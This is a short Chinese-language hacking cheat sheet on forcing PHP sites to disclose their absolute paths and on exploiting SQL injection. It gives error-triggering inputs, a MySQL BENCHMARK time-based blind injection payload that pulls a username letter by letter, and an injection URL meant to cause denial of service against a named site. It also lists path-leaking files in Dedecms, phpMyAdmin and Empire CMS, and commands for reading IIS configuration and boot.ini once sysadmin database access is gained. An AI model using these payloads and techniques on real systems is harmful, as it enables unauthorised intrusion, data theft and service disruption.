1、加引号'这个最常用

 

2、变参数类型，比如把id=1改为id=a等 有时很有效果

 

3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果

 

4、text.php?aa[]=xx

 

5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试.

 

6、benchmark(999999999999999999, md5( 'test' ))

BENCHMARK(count,expr)：BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*

利用找个函数可以作拒绝服务攻击！！http://www.heimian.com/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))，不过前提还是要求可以注射。

 

Dedecms:  

 

 /member/templets/menulit.php

 

phpmyadmin:

 

phpmyadmin/themes/darkblue_orange/layout.inc.php

 

phpmyadmin/libraries/lect_lang.lib.php

phpmyadmin/libraries/mcrypt.lib.php

phpmyadmin/libraries/select_lang.lib.php

 

Empire cms:

 

e/data/html/memberfhtml.php

 

Aspx:

 

~aspx.aspx

 

SA权限找网站路径

 

一种思路是 读取iis配置文件

type c:\boot.ini

set

type C:\WINDOWS\system32\inetsrv\MetaBase.xml

win2k是metabase.bin

第二种是用vbs脚本读取虚拟网站的目录

cscript web.vbs